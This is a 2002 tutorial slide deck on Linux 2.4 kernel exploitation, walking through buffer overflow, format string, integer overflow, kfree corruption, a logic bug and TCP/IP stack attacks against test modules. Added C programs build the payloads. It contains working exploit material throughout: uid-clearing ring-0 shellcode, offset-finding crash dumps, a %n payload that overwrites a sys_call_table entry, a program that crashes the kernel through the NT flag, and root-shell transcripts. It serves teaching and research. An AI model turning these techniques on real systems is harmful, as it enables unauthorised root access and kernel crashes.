Linux kernel exploit
DOC: alert7 <alert7@xfocus.org>
PPT: e4gle <e4gle@whitecell.org>
2002-12-2
Outline
    Linux kernel exploit: what it is and how it works
    Kernel exploit classes:
        Kernel Buffer Overflow
        Kernel Format String vulnerability
        Kernel Integer Overflow
        Kernel kfree() Parameter Corruption
        Kernel Program Logic Vulnerability
        TCP/IP stack vulnerabilities
Questions about the shellcode and exploits in these slides: mail alert7@xfocus.org or e4gle@whitecell.org.
What a kernel exploit is: an exploit for a bug in the Linux kernel itself. Kernel code runs in ring 0, so the payload runs with full privilege; the usual goal is simply to set the current process's uid to 0 (uid=0, root) from inside the kernel, then return to user space and run a shell.
Kernel exploit basics: entering the kernel. On an INT (the int 0x80 system call, or an exception) the CPU loads the kernel SS:ESP from the TSS, pushes the user SS, ESP, EFLAGS, CS and EIP onto that kernel stack (plus an error code for some exceptions), and then loads CS:EIP from the IDT entry. Those five pushed words are what iret later pops to get back to user mode.
Kernel exploit basics: finding the current task from ESP. The kernel stack is 8 KB and task_struct sits at its bottom, so the kernel recovers current by masking ESP (include/asm-i386/current.h):

    static inline struct task_struct * get_current(void)
    {
        struct task_struct *current;
        asm ("andl %%esp,%0; ":"=r" (current) : "0" (~8191UL));
        return current;
    }

    #define current get_current()

Kernel shellcode uses exactly the same trick to find task_struct and its uid field.
Kernel exploit classes covered next:
    1. kernel BOF (buffer overflow)
    2. kernel format string vulnerability
    3. kernel integer overflow
    4. kernel kfree() parameter corruption
    5. kernel program logic error
    6. TCP/IP stack
Kernel Buffer Overflow: the test module kbof.c is an LKM with a stack buffer overflow. Build and load it as root:

    [root@redhat73 test]# gcc -O3 -c -I/usr/src/linux/include kbof.c
    [root@redhat73 test]# insmod -f kbof.o
    Warning: kernel-module version mismatch
            kbof.o was compiled for kernel version 2.4.18-3custom
            while this kernel is version 2.4.18-3
    Warning: loading kbof.o will taint the kernel: no license
    Warning: loading kbof.o will taint the kernel: forced load
    [root@redhat73 test]# lsmod | grep kbof
    kbof                    1040   0  (unused)
Kernel Buffer Overflow: as with a user-space stack overflow, a kernel BOF needs three things: RETLOC (where the return address sits in the overflowed buffer), RETADDR (what to put there) and a shellcode.
Kernel Buffer Overflow: finding RETLOC. kbof_exploit1.c fills the buffer with 'A' (0x41):

    [alert7@redhat73 alert7]$ ./kbof_exploit1
    Segmentation fault

The process kbof_exploit dies, and the kernel logs an oops.
Kernel Buffer Overflow: the oops (from /var/log/messages, Oct 24 09:33:19, syslog prefix stripped)

    Unable to handle kernel paging request at virtual address 41414141
    printing eip:
    41414141
    *pde = 00000000
    Oops: 0000
    kbof pcnet32 mii usb-uhci usbcore BusLogic sd_mod scsi_mod
    CPU:    0
    EIP:    0010:[<41414141>]    Tainted: PF
    EFLAGS: 00000282
    EIP is at Using_Versions [] 0x41414140 (2.4.18-3)
    eax: 00000400   ebx: c3877c00   ecx: 00000000   edx: bffffb60
    esi: 41414141   edi: 41414141   ebp: 41414141   esp: c18effa4
    ds: 0018   es: 0018   ss: 0018
    Process kbof_exploit (pid: 694, stackpage=c18ef000)
    Stack: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
           41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
           41414141 41414141 41414141 41414141 41414141 41414141 41414141
    Call Trace:
    Code: Bad EIP value.

EIP, EBP, ESI and EDI are all 0x41414141: the return address and the saved registers were overwritten by the 'A' filler.
Kernel Buffer Overflow: disassembly of the vulnerable function test() in kbof.o (objdump)

    00000000 <test>:
       0:   55                      push   %ebp
       1:   89 e5                   mov    %esp,%ebp
       3:   57                      push   %edi
       4:   56                      push   %esi
       5:   81 ec 00 01 00 00       sub    $0x100,%esp
       b:   8b 45 08                mov    0x8(%ebp),%eax
       e:   89 c1                   mov    %eax,%ecx
      10:   8b 75 0c                mov    0xc(%ebp),%esi
      13:   8d bd f8 fe ff ff       lea    0xfffffef8(%ebp),%edi
      19:   c1 e9 02                shr    $0x2,%ecx
      1c:   f3 a5                   repz movsl %ds:(%esi),%es:(%edi)
      1e:   a8 02                   test   $0x2,%al
      20:   74 02                   je     24 <test+0x24>
      22:   66 a5                   movsw  %ds:(%esi),%es:(%edi)
      24:   a8 01                   test   $0x1,%al
      26:   74 01                   je     29 <test+0x29>
      28:   a4                      movsb  %ds:(%esi),%es:(%edi)
      29:   81 c4 00 01 00 00       add    $0x100,%esp
      2f:   5e                      pop    %esi
      30:   5f                      pop    %edi
      31:   5d                      pop    %ebp
      32:   c3                      ret
      33:   90                      nop

The body is an inlined memcpy: len (0x8(%ebp)) bytes are copied from the second argument (0xc(%ebp)) into the 256-byte local buffer at ebp-0x108, with no check on len.
Kernel Buffer Overflow: the stack frame of test() while the copy runs (from the prologue push %ebp / push %edi / push %esi / sub $0x100,%esp):

    high addresses
    +----------------------+
    | return EIP           |  ebp+4      <- RETLOC
    | saved EBP            |  ebp
    | saved EDI            |  ebp-4
    | saved ESI            |  ebp-8
    | buf[256]             |  ebp-0x108 .. ebp-9   (256 bytes)
    +----------------------+  <- esp
    low addresses

The copy starts at buf and runs for len bytes, so with len > 256 it walks over the saved ESI, EDI and EBP and then the return EIP. After ret, EIP and EBP (and ESP, once the frame is gone) are under our control.
Kernel Buffer Overflow: so RETLOC is code[256+8+4], offset 268 in the buffer. kbof_exploit2.c is kbof_exploit1.c with 'B' (0x42) bytes at code[256+8+4]:

    [alert7@redhat73 alert7]$ ./kbof_exploit2
    Segmentation fault
Kernel Buffer Overflow: the oops now (Oct 24 10:11:10, syslog prefix stripped)

    <1>Unable to handle kernel paging request at virtual address 42424242
    printing eip:
    42424242
    *pde = 00000000
    Oops: 0000
    kbof pcnet32 mii usb-uhci usbcore BusLogic sd_mod scsi_mod
    CPU:    0
    EIP:    0010:[<42424242>]    Tainted: PF
    EFLAGS: 00000282
    EIP is at Using_Versions [] 0x42424241 (2.4.18-3)
    eax: 00000110   ebx: c2a69e00   ecx: 00000000   edx: bffff870
    esi: 41414141   edi: 41414141   ebp: 41414141   esp: c2ba1fa4
    ds: 0018   es: 0018   ss: 0018
    Process kbof_exploit (pid: 730, stackpage=c2ba1000)
    Stack: 00000110 c2a69e00 00000110 c2a69e00 c2ba0000 40013020 bffff738 c0108923
           00000110 bffff760 00000000 40013020 bffffbd4 bffff738 000000f0 0000002b
           0000002b 000000f0 080484f8 00000023 00000286 bffff730 0000002b
    Call Trace: [<c0108923>] system_call [kernel] 0x33
    Code: Bad EIP value.

EIP is 0x42424242 ('BBBB'): code[256+8+4] really is the return address, and we control EIP. ESI, EDI and EBP still carry the 'A' filler. The call trace ends at system_call+0x33, the return address of the call *sys_call_table(,%eax,4) in the syscall entry, and the words at the top of the kernel stack are the registers saved on syscall entry, ending with the user EIP 080484f8, CS 23, EFLAGS 286, ESP bffff730 and SS 2b.
Kernel Buffer Overflow: RETADDR is the address of the shellcode. The kernel runs in the address space of the calling process, so the shellcode can simply live in the exploit's own user memory (the later runs print "code addr is:0xbffff760", a user stack address).
Kernel Buffer Overflow: SHELLCODE. Find task_struct from ESP, with the same mask get_current() uses, and write 0 into its uid field (offset 0x128 in this 2.4.18 task_struct):

    0xb8,0x00,0xe0,0xff,0xff,                           /* mov  $0xffffe000,%eax */
    0x21,0xe0,                                          /* and  %esp,%eax        */
    0xc7,0x80,0x28,0x01,0x00,0x00,0x00,0x00,0x00,0x00,  /* movl $0x0,0x128(%eax) */
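Added example (my own code, not from the slides or from kbof_exploit*.c): the kbof payload layout and the uid-clearing stub, in C. It takes the frame layout from the objdump above (buf[256], saved ESI/EDI/EBP, return address), the 8 KB stack mask from get_current() and the 0x128 uid offset from the shellcode listing; the host is assumed little-endian like the x86 target, and the function names are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Frame of test() in kbof.o, from the objdump: buf[256] at the bottom, then
   the ESI, EDI and EBP pushed by the prologue, then the return address. */
#define BUF_SIZE    256
#define SAVED_REGS  3                               /* esi, edi, ebp */
#define RETLOC_OFF  (BUF_SIZE + 4 * SAVED_REGS)     /* 268 == 256 + 8 + 4 */

/* Facts about the 2.4.18 target taken from the slides: 8 KB kernel stack with
   task_struct at its bottom (get_current() masks ESP with ~8191), uid at
   offset 0x128 in task_struct. */
#define THREAD_MASK 0xffffe000U
#define UID_OFFSET  0x128U

/* What get_current() derives from a kernel-mode ESP value. */
static uint32_t current_from_esp(uint32_t esp)
{
    return esp & THREAD_MASK;
}

/* Encode the uid-clearing stub for a given uid offset:
       mov  $0xffffe000,%eax       b8 00 e0 ff ff
       and  %esp,%eax              21 e0
       movl $0,off(%eax)           c7 80 <off32> 00 00 00 00
   Returns the stub length (17). Little-endian host assumed for the memcpy. */
static size_t encode_set_uid0(uint32_t uid_off, uint8_t *out)
{
    static const uint8_t head[] = { 0xb8, 0x00, 0xe0, 0xff, 0xff,
                                    0x21, 0xe0,
                                    0xc7, 0x80 };
    memcpy(out, head, sizeof head);
    memcpy(out + sizeof head, &uid_off, 4);   /* disp32 */
    memset(out + sizeof head + 4, 0, 4);      /* imm32 = 0 */
    return sizeof head + 8;
}

/* Lay out the buffer handed to the module: filler across buf and the three
   saved registers, then RETADDR at RETLOC_OFF. kbof_exploit2 used 0x42424242
   here to prove control of EIP; the later exploits pass the shellcode
   address. Returns the payload length, or 0 if out is too small. */
static size_t build_kbof_payload(uint32_t retaddr, uint8_t fill,
                                 uint8_t *out, size_t outsz)
{
    if (outsz < RETLOC_OFF + 4)
        return 0;
    memset(out, fill, RETLOC_OFF);
    memcpy(out + RETLOC_OFF, &retaddr, 4);
    return RETLOC_OFF + 4;
}

int main(void)
{
    uint8_t sc[32], payload[RETLOC_OFF + 4];
    size_t n = encode_set_uid0(UID_OFFSET, sc);

    printf("shellcode (%zu bytes):", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", sc[i]);
    printf("\ncurrent for esp 0xc18effa4 is 0x%08x\n",
           current_from_esp(0xc18effa4U));

    n = build_kbof_payload(0x42424242U, 0x41, payload, sizeof payload);
    printf("payload: %zu bytes, RETLOC at offset %d\n", n, RETLOC_OFF);
    return 0;
}
```

current_from_esp(0xc18effa4) gives 0xc18ee000, one page below the stackpage=c18ef000 in the first oops, which is consistent with the 2.4 oops printer showing current + 4096 as the stackpage.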
Kernel Buffer Overflow: with RETLOC and RETADDR known, put the two together and the shellcode runs in ring 0: kbof_exploit2.c.
Kernel Buffer Overflow: but the goal is a root shell, not a uid change in a process that oopses a moment later. The shellcode has to get back to user space cleanly.
Kernel Buffer Overflow: kbof_exploit3.c sets uid to 0 (UID 0) in the current task; what remains is the return from the kernel.
Kernel Buffer Overflow: getting back to user space. task_struct and the kernel stack share one two-page allocation:

    #define alloc_task_struct() ((struct task_struct *) __get_free_pages(GFP_KERNEL,1))

so the top of the kernel stack is current + 8192, and right below it sit the registers saved on entry, ending with the frame iret pops. That frame decides which ESP and EIP the process resumes with.
Kernel Buffer Overflow: the top of the kernel stack just before iret (task at 0xc31e8000, stack ends at 0xc31ea000)

    0xc31e9fa4: 0x00000110 0xc3168000 0x00000110 0xc3168000
    0xc31e9fb4: 0xc31e8000 0x40013020 0xbffff738 0xc0108923
    0xc31e9fc4: 0x00000110 0xbffff760 0x00000000 0x40013020
    0xc31e9fd4: 0xbffffbd4 0xbffff738 0x000000f0 0x0000002b
    0xc31e9fe4: 0x0000002b 0x000000f0 0x0804859c 0x00000023   <- ... EIP CS
    0xc31e9ff4: 0x00000286 0xbffff730 0x0000002b 0x00000000   <- EFLAGS ESP SS

The last five words (EIP 0x0804859c, CS 0x23, EFLAGS, ESP, SS) are what iret pops; CS 0x23 is the user code selector, so iret returns to user mode at 0x0804859c. Overwrite that saved EIP with an address inside our own program (0x8048xx) and the kernel hands control to code of our choosing, in user mode, with uid already 0: kbof_exploit4.c.
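Added example, not from the slides: a C model of the saved-register frame that kbof_exploit4 edits. The struct is the 2.4 i386 struct pt_regs layout, THREAD_SIZE is 8192 as on this target, and the sample words are the fifteen words from 0xc31e9fc4 of the dump above, copied into a fake 8 KB stack so the code runs in user space; the function names and the user-mode sanity check are mine.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* 2.4 i386 struct pt_regs: what SAVE_ALL leaves at the very top of the 8 KB
   kernel stack of a process that entered through system_call. The last five
   words are the hardware INT frame that iret consumes. */
struct pt_regs_24 {
    uint32_t ebx, ecx, edx, esi, edi, ebp, eax;
    uint32_t xds, xes;
    uint32_t orig_eax;
    uint32_t eip, xcs, eflags, esp, xss;
};

#define THREAD_SIZE 8192U
#define USER_CS     0x23U
#define USER_DS     0x2bU

/* task_struct sits at the bottom of the two pages, so the frame is the last
   sizeof(struct pt_regs) bytes before task + THREAD_SIZE. */
static uint32_t eip_slot_addr(uint32_t task)
{
    return task + THREAD_SIZE - sizeof(struct pt_regs_24)
           + offsetof(struct pt_regs_24, eip);
}

static struct pt_regs_24 *regs_of(uint8_t *stack_bottom)
{
    return (struct pt_regs_24 *)(stack_bottom + THREAD_SIZE - sizeof(struct pt_regs_24));
}

/* Check that the frame really is a return to user mode before trusting it. */
static int frame_is_user(const struct pt_regs_24 *r)
{
    return r->xcs == USER_CS && r->xss == USER_DS &&
           r->xds == USER_DS && r->xes == USER_DS;
}

/* kbof_exploit4's move: point the saved EIP at our own user-mode code.
   Returns the EIP that was there. */
static uint32_t redirect_return(struct pt_regs_24 *r, uint32_t new_eip)
{
    uint32_t old = r->eip;
    r->eip = new_eip;
    return old;
}

/* Constructed sample: the words at 0xc31e9fc4..0xc31e9ffc of the dump above
   (task 0xc31e8000), placed at the top of a fake 8 KB stack. */
static const uint32_t dump_fc4[15] = {
    0x00000110, 0xbffff760, 0x00000000, 0x40013020, 0xbffffbd4, 0xbffff738, 0x000000f0,
    0x0000002b, 0x0000002b,
    0x000000f0,
    0x0804859c, 0x00000023, 0x00000286, 0xbffff730, 0x0000002b,
};
static uint32_t fake_stack[THREAD_SIZE / 4];

static struct pt_regs_24 *load_sample(void)
{
    memset(fake_stack, 0, sizeof fake_stack);
    memcpy((uint8_t *)fake_stack + THREAD_SIZE - sizeof dump_fc4,
           dump_fc4, sizeof dump_fc4);
    return regs_of((uint8_t *)fake_stack);
}

int main(void)
{
    struct pt_regs_24 *r = load_sample();
    uint32_t old;

    printf("EIP slot for task 0xc31e8000 is at 0x%08x\n", eip_slot_addr(0xc31e8000U));
    printf("user frame: %d, eip=0x%08x cs=0x%02x eflags=0x%x esp=0x%08x ss=0x%02x\n",
           frame_is_user(r), r->eip, r->xcs, r->eflags, r->esp, r->xss);
    old = redirect_return(r, 0x08048000U);
    printf("old eip 0x%08x, now 0x%08x\n", old, r->eip);
    return 0;
}
```

eip_slot_addr(0xc31e8000) is 0xc31e9fec, the address of the 0x0804859c word in the dump, so the arithmetic matches what the kernel stack shows.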
Kernel Buffer Overflow:

    [alert7@redhat73 alert7]$ ./kbof_exploit5
    code addr is:0xbffff760
    Segmentation fault (core dumped)

A core dump this time, so the crash is in user space and gdb can look at it.
Kernel Buffer Overflow: gdb on the core

    #0  0x080485ce in new_function ()
    (gdb) i reg
    eax     0xc298ffec  -1030160404
    ecx     0x0         0
    edx     0xbffff870  -1073743760
    ebx     0x23        35
    esp     0xbffff730  0xbffff730
    ebp     0x41414141  0x41414141
    esi     0x41414141  1094795585
    edi     0x41414141  1094795585
    eip     0x80485ce   0x80485ce
    eflags  0x286       646
    cs      0x23        35
    ss      0x2b        43
    ds      0x0         0
    es      0x0         0
    fs      0x0         0
    gs      0x0         0
    (gdb) x/i $eip
    0x80485ce <new_function+22>:    mov %eax,0xfffffff8(%ebp)

We are back in user mode inside new_function, but EBP (and ESI, EDI) still hold the 0x41414141 from the overflow and DS/ES are 0: the registers the kernel normally restores before iret were never reloaded, and the first instruction that goes through EBP faults. The user-side code of the exploit must not depend on EBP (kbof_exploit5.c).
Kernel Buffer Overflow:

    [alert7@redhat73 alert7]$ ./kbof_exploit6
    code addr is:0xbffff760
    Segmentation fault (core dumped)
Kernel Buffer Overflow: registers at this crash

    eax     0x1         1
    ecx     0x42130f08  1108545288
    edx     0xbffffbdc  -1073742884
    ebx     0x4213030c  1108542220
    esp     0xbffffb68  0xbffffb68
    ebp     0xbffffb68  0xbffffb68
    esi     0x40013020  1073819680
    edi     0xbffffbd4  -1073742892
    eip     0x80483d3   0x80483d3
    eflags  0x292       658
    cs      0x23        35
    ss      0x2b        43
    ds      0x2b        43
    es      0x2b        43
    fs      0x0         0
    gs      0x0         0

EBP and ESP are sane now and DS/ES hold the user data selector 0x2b (they were 0 in the previous crash): the segment registers have to be set up by the exploit itself before its user-mode code touches memory.
Kernel Buffer Overflow: root shell

    [alert7@redhat73 alert7]$ ./kbof_exploit7
    code addr is:0xbffff760
    sh-2.05a# id
    uid=0(root) gid=500(alert7) groups=500(alert7)
Kernel format string vulnerability: the test module is kformat.c.
Kernel format string exploit: a printk() whose format string comes from the user. The kernel's printf supports %n, so as with the BOF we need a RETLOC and a RETADDR, and %n does the write.
Does the kernel printf() support %n? Check the kernel source (lib/vsprintf.c): %n and %hn (the h qualifier) are implemented; positional arguments ($) are not.
RETLOC in the kernel: we need a pointer the kernel will call through. sys_call_table is the natural choice; system_call (arch/i386/kernel/entry.S) indexes it with the syscall number and calls the entry:
    ENTRY(system_call)
            pushl %eax                      # save orig_eax
            SAVE_ALL
            GET_CURRENT(%ebx)
            testb $0x02,tsk_ptrace(%ebx)    # PT_TRACESYS
            jne tracesys
            cmpl $(NR_syscalls),%eax
            jae badsys
            call *SYMBOL_NAME(sys_call_table)(,%eax,4)
            movl %eax,EAX(%esp)             # save the return value
    ENTRY(ret_from_sys_call)
            cli                             # need_resched and signals atomic test
            cmpl $0,need_resched(%ebx)
            jne reschedule
            cmpl $0,sigpending(%ebx)
            jne signal_return
    restore_all:
            RESTORE_ALL

The address of sys_call_table is exported, so read it from /proc/ksyms.
    [alert7@redhat73 alert7]$ cat /proc/ksyms | grep sys_call_table
    c02c209c sys_call_table_Rdfdb18bd

Pick entry 241: RETLOC = sys_call_table + 241*4. Overwrite it with the address of the SHELLCODE, then invoke syscall 241 and the kernel calls the shellcode in ring 0.
SHELLCODE placement: %n (or %hn) writes the number of characters printed so far, so the address to write should be small. The exploit maps its shellcode at a low address with mmap(): ld links the binary at 0x08048000, so the range from address 0 up to there is unused and can be mapped, and the shellcode address then fits in a single write.
The exploit: kformat_exploit1.c.
The format string: first the 4 bytes of retloc, then a conversion with field width len, then %n. retloc = sys_call_table + 241*4: /proc/ksyms gave c02c209c for sys_call_table_Rdfdb18bd, so retloc = 0xC02C2460. %n writes the count of characters output so far, so with len = shellcode_addr - 4 (the 4 retloc bytes are already counted) %n writes exactly shellcode_addr into the table slot.
    [alert7@redhat73 alert7]$ ./kformat_exploit
    shellcode addr is:0x17ae
    shell addr is 0x1780
    `$,?6058p%n
    sh-2.05a# id
    uid=0(root) gid=500(alert7) groups=500(alert7)
    sh-2.05a#

Ok. The echoed line is the format string itself: the retloc bytes 0x60 0x24 0x2c 0xc0 render as "`$,?", followed by the conversion (evidently %6058p) and %n; 6058 + 4 = 6062 = 0x17ae, the shellcode address.
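Added example, my own code rather than kformat_exploit1.c: computing RETLOC from the /proc/ksyms value, building the retloc-bytes + %<len>p%n string, and checking the count arithmetic against a small re-implementation of the printf subset involved (literal bytes, %<width>p, %n, %hn). The %p conversion is inferred from the echoed format string above; which stack slot supplies the %n pointer on the real kernel is not stated on the page, so here the pointer is passed explicitly and a local array stands in for sys_call_table.

```c
#include <stdarg.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* From the 2.4.18-3 box on the slides: sys_call_table per /proc/ksyms, and
   the entry chosen as RETLOC. */
#define SYS_CALL_TABLE 0xc02c209cU
#define RETLOC_SLOT    241

static uint32_t retloc_addr(void)
{
    return SYS_CALL_TABLE + RETLOC_SLOT * 4;    /* 0xc02c2460 */
}

struct outbuf { char *p; size_t size, n; };

static void emit_char(struct outbuf *o, char c)
{
    if (o->n + 1 < o->size)
        o->p[o->n] = c;
    o->n++;                 /* %n reports this count, truncated or not */
}

/* The subset of lib/vsprintf.c behaviour the attack depends on: literal
   bytes, %<width>p (hex, space padded to width), %n and %hn. Written for
   this example; it is not the kernel's code. Returns -1 on anything else. */
static int mini_vsnprintf(char *buf, size_t size, const char *fmt, va_list ap)
{
    struct outbuf o = { buf, size, 0 };
    for (const char *f = fmt; *f; f++) {
        if (*f != '%') { emit_char(&o, *f); continue; }
        unsigned width = 0;
        int half = 0;
        f++;
        while (*f >= '0' && *f <= '9')
            width = width * 10 + (unsigned)(*f++ - '0');
        if (*f == 'h') { half = 1; f++; }
        switch (*f) {
        case 'p': {
            char tmp[2 * sizeof(void *) + 1];
            unsigned len = (unsigned)snprintf(tmp, sizeof tmp, "%lx",
                                (unsigned long)(uintptr_t)va_arg(ap, void *));
            for (unsigned i = len; i < width; i++) emit_char(&o, ' ');
            for (unsigned i = 0; i < len; i++) emit_char(&o, tmp[i]);
            break;
        }
        case 'n':
            if (half) *va_arg(ap, uint16_t *) = (uint16_t)o.n;
            else      *va_arg(ap, uint32_t *) = (uint32_t)o.n;
            break;
        case '%':
            emit_char(&o, '%');
            break;
        default:
            return -1;
        }
    }
    if (size)
        buf[o.n < size ? o.n : size - 1] = '\0';
    return (int)o.n;
}

static int mini_snprintf(char *buf, size_t size, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = mini_vsnprintf(buf, size, fmt, ap);
    va_end(ap);
    return r;
}

/* Attack string: retloc's four little-endian bytes, then %<len>p%n with
   len = target - 4, so exactly `target` characters have been counted when
   %n fires. Needs target >= 4 and no zero byte in retloc. Returns its length. */
static size_t build_fmt(uint32_t retloc, uint32_t target, char *fmt, size_t fmtsz)
{
    memcpy(fmt, &retloc, 4);
    int k = snprintf(fmt + 4, fmtsz - 4, "%%%up%%n", (unsigned)(target - 4));
    return 4 + (size_t)k;
}

/* Simulated write: fake_table stands in for sys_call_table. In the kernel the
   %p and %n arguments are whatever the buggy printk picks up from its stack;
   here they are passed explicitly. Returns what landed in the RETLOC slot. */
static uint32_t simulate_write(uint32_t shellcode_addr)
{
    static uint32_t fake_table[256];
    static char out[65536];
    uint32_t *slot = &fake_table[RETLOC_SLOT];
    char fmt[64];

    *slot = 0;
    build_fmt(retloc_addr(), shellcode_addr, fmt, sizeof fmt);
    mini_snprintf(out, sizeof out, fmt, (void *)0, slot);
    return *slot;
}

int main(void)
{
    char fmt[64];
    size_t n = build_fmt(retloc_addr(), 0x17ae, fmt, sizeof fmt);
    printf("RETLOC = 0x%08x, format tail = \"%s\" (%zu bytes total)\n",
           retloc_addr(), fmt + 4, n);
    printf("slot now holds 0x%08x\n", simulate_write(0x17ae));
    return 0;
}
```

With the shellcode at 0x17ae the tail is "%6058p%n", exactly what the exploit echoed, and the slot ends up holding 0x17ae. Had the shellcode lived above 0xffff, two %hn writes (low and high half, each with its own retloc bytes) would be needed, which is why the exploit maps the shellcode low.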
Kernel integer overflow: kinteger.c takes a length len from the user and checks it with

    if (len > 256) len = 256;

but len is signed, so a negative value passes the check; strncpy_from_user() then receives it as a huge unsigned length and copies far past the 256-byte buffer. kinteger_exploit.c:

    [alert7@redhat73 alert7]$ ./kinteger_exploit
    sh-2.05a# id
    uid=0(root) gid=500(alert7) groups=500(alert7)
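Added example (mine, not kinteger.c, whose source is not on the page): the signed-length check as described, beside a fixed version, both run against an emulated strncpy_from_user() with a marker word placed right after the 256-byte buffer to stand in for whatever follows it on the kernel stack. The names and the marker layout are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define KBUF 256

/* Emulation of strncpy_from_user(): copy up to `count` bytes, stopping after
   the terminating NUL. Returns the number of bytes copied. */
static size_t sim_strncpy_from_user(unsigned char *dst, const char *src,
                                    unsigned long count)
{
    size_t i = 0;
    while (i < count) {
        dst[i] = (unsigned char)src[i];
        if (!src[i])
            break;
        i++;
    }
    return i;
}

/* The check as the slide describes kinteger.c: a signed upper-bound test
   only. A negative len survives it and becomes a huge unsigned long on the
   way into the copy routine. */
static unsigned long vulnerable_clamp(int len)
{
    if (len > KBUF)
        len = KBUF;
    return (unsigned long)len;
}

/* Hardened check: refuse negatives before any conversion to unsigned. */
static unsigned long fixed_clamp(int len)
{
    if (len < 0)
        return 0;            /* a real syscall would return -EINVAL */
    if (len > KBUF)
        len = KBUF;
    return (unsigned long)len;
}

/* Constructed "user" string: n bytes of 'A' (n < 512). */
static const char *user_string(size_t n)
{
    static char s[512];
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

/* region: the KBUF-byte kernel buffer, then a 4-byte marker standing in for
   the saved registers / return address that follow it on the kernel stack,
   then slack so the demo itself stays in bounds. Returns the marker after
   the copy. */
static uint32_t run_copy(unsigned long (*clamp)(int), int user_len,
                         const char *user_str)
{
    unsigned char region[KBUF + 4 + 512];
    uint32_t marker = 0xdeadbeef;

    memset(region, 0, sizeof region);
    memcpy(region + KBUF, &marker, 4);
    sim_strncpy_from_user(region, user_str, clamp(user_len));
    memcpy(&marker, region + KBUF, 4);
    return marker;
}

int main(void)
{
    const char *s = user_string(300);
    printf("len=-1,  vulnerable: marker=0x%08x\n", run_copy(vulnerable_clamp, -1, s));
    printf("len=300, vulnerable: marker=0x%08x\n", run_copy(vulnerable_clamp, 300, s));
    printf("len=-1,  fixed:      marker=0x%08x\n", run_copy(fixed_clamp, -1, s));
    return 0;
}
```

With len = -1 the vulnerable path copies the whole 300-byte string and the marker becomes 0x41414141 ('AAAA'); with len = 300 the clamp works and the marker survives, and the fixed check refuses the negative length outright.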
Kernel kfree() parameter corruption: the test module is kfree.c. The bug lets the user influence the pointer handed to kfree(), and the exploit works by corrupting that kfree() argument.
Kernel program logic vulnerability, example: BUGTRAQ ID 6115, Linux kernel 2.4.x. Linux lets a process enter the kernel through the lcall7 / lcall27 call gates while the NT or TF bit of EFLAGS is set.
Exploit (redhat 7.3):

    /* TF variant: the same trick with the trap flag (0x100) */
    #define MSUX "mov $0x100,%eax\npushl %eax\nmov $0x1,%eax\npopfl\nlcall $7,$0"

    //int NT_MASK = 0x00004000;

    int main(void)
    {
        asm("mov $0x00004000,%eax\n\t"   /* NT */
            "pushl %eax\n\t"
            "popfl\n\t"
            "lcall $7,$0");
        return 1;
    }
Why it works: EFLAGS is saved on entry to the kernel and restored on the way out. In user mode NT and TF are normally 0. The program sets NT to 1 with pushl/popfl and then enters the kernel with lcall $7,$0, so the kernel runs with NT = 1 and finally executes IRET. An IRET with NT set is a task return: the CPU switches to the task named in the TSS back link, which Linux never set up, and the kernel dies. MSUX does the same with TF.
TCP/IP stack vulnerabilities: a bug in the TCP/IP stack fires in bottom half (BH) context, not in the context of a process we own, so the exploit cannot just set current->uid = 0 and return.
TCP/IP exploit, two stages: SHELLCODE1 runs where the bug fires and does only one thing, write RETLOC (a sys_call_table entry) so that it points at SHELLCODE2; SHELLCODE2 then runs in process context, when our own process invokes that syscall, and there it can set uid 0 and return normally.
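Added example, a user-space model of my own rather than kipstack.c: a sys_call_table with slot 241 hijacked in two stages, stage 1 doing nothing but the pointer write (it runs in BH context, where current is not ours) and stage 2 clearing uid when the attacker's process invokes the slot and then restoring the entry. The format-string exploit above is the single-stage form of the same idea, with the slot pointing straight at the uid-0 shellcode. Table size, task struct and dispatcher are constructed for the demo, not kernel code.

```c
#include <stdint.h>
#include <stdio.h>

/* Slot 241 is the one the slides use; NR_SYSCALLS and everything else here
   are demo values. */
#define NR_SYSCALLS 256
#define HIJACK_SLOT 241
#define ENOSYS_RET  (-38)

struct task { uint32_t uid, euid; };
typedef long (*syscall_fn)(struct task *cur);

static long sys_ni_syscall(struct task *cur)
{
    (void)cur;
    return ENOSYS_RET;
}

static syscall_fn sys_call_table[NR_SYSCALLS];
static syscall_fn saved_entry;

/* Stage 2: runs in process context, so `cur` is the calling task. It puts
   the slot back so the hijack is single-use and no other process trips on it. */
static long stage2(struct task *cur)
{
    cur->uid = cur->euid = 0;
    sys_call_table[HIJACK_SLOT] = saved_entry;
    return 0;
}

/* Stage 1: nothing but a pointer write; it must not rely on `current`. */
static void stage1(void)
{
    saved_entry = sys_call_table[HIJACK_SLOT];
    sys_call_table[HIJACK_SLOT] = stage2;
}

/* system_call in miniature: bounds check, then the indirect call through the
   table (the call *sys_call_table(,%eax,4) shown above). */
static long do_syscall(unsigned nr, struct task *cur)
{
    if (nr >= NR_SYSCALLS)
        return ENOSYS_RET;
    return sys_call_table[nr](cur);
}

static void init_table(void)
{
    for (unsigned i = 0; i < NR_SYSCALLS; i++)
        sys_call_table[i] = sys_ni_syscall;
}

/* Whole sequence: the bug fires (stage 1), the attacker's process invokes
   the slot and becomes uid 0, a bystander invoking it afterwards only gets
   ENOSYS. Returns 1 when all of that holds. */
static int demo(void)
{
    struct task attacker = { 500, 500 }, bystander = { 500, 500 };
    init_table();
    stage1();
    long r1 = do_syscall(HIJACK_SLOT, &attacker);
    long r2 = do_syscall(HIJACK_SLOT, &bystander);
    return r1 == 0 && attacker.uid == 0 && attacker.euid == 0 &&
           r2 == ENOSYS_RET && bystander.uid == 500 &&
           sys_call_table[HIJACK_SLOT] == sys_ni_syscall;
}

int main(void)
{
    printf("two-stage hijack %s\n", demo() ? "ok" : "failed");
    return 0;
}
```

The point of the split is visible in stage1(): it needs no task, no stack layout and no return path, only a writable word, which is all a BH-context bug can reliably give you.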
TCP/IP test module: kipstack.c.

References
    1. 80386 (Intel manual)
    2. Linux kernel 2.4.18 source
    3. http://www.linuxforum.net
    4. LSD, kernvuln-1.0.2, http://lsd-pl.net/